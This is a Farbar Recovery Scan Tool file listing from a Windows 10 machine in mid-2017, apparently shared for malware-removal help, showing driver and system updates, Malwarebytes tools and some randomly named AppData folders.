2017-08-04 22:53 - 2017-08-04 22:55 - 000000000 ____D C:\Users\****\.minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\AppData\Roaming\gg.minion.Minion
2017-08-04 22:53 - 2017-08-04 22:53 - 000000000 ____D C:\Users\****\.oracle_jre_usage
2017-08-04 22:52 - 2017-08-04 22:52 - 052825304 _____ (Good Game Mods LLC ) C:\Users\****\Desktop\Minion3.0.5.exe
2017-08-04 22:52 - 2017-08-04 22:52 - 000000664 _____ C:\Users\****\Documents\Minion.lnk
2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC
2017-08-01 15:04 - 2017-08-01 15:36 - 000122733 _____ C:\Users\****\Desktop\Addition.txt
2017-08-01 15:01 - 2017-08-06 01:14 - 000024036 _____ C:\Users\****\Desktop\FRST.txt
2017-08-01 12:17 - 2017-08-03 22:03 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-08-01 12:17 - 2017-08-01 12:40 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\****\AppData\Local\Nybgy
2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-01 12:15 - 2017-08-01 12:40 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-08-01 12:14 - 2017-08-01 12:53 - 000000000 ____D C:\Users\****\Desktop\mbar
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\****\Desktop\mbar-1.09.3.1001.exe
2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP
2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Desktop\FRST64.exe
2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\LocalLow\Mozilla
2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\****\AppData\Local\Mozilla
2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-08-01 01:54 - 2017-08-01 01:54 - 000002302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-01 01:54 - 000002290 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\****\AppData\Local\PDF24
2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Usidikujp
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Rvurcez
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Yhwopc
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Wqy He
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bizpiwcinu
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bgew
2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\****\AppData\LocalLow\Thunder Lotus Games
2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk
2017-07-12 19:41 - 2017-06-30 16:47 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-07-12 19:41 - 2017-06-30 16:47 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-11 20:54 - 2017-07-07 09:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-11 20:54 - 2017-07-07 09:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-11 20:54 - 2017-07-07 08:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-07-11 20:54 - 2017-07-07 08:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-07-11 20:54 - 2017-07-07 08:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-07-11 20:54 - 2017-07-07 08:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-11 20:54 - 2017-07-07 08:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-11 20:54 - 2017-06-20 08:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-07-11 20:54 - 2017-06-20 08:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
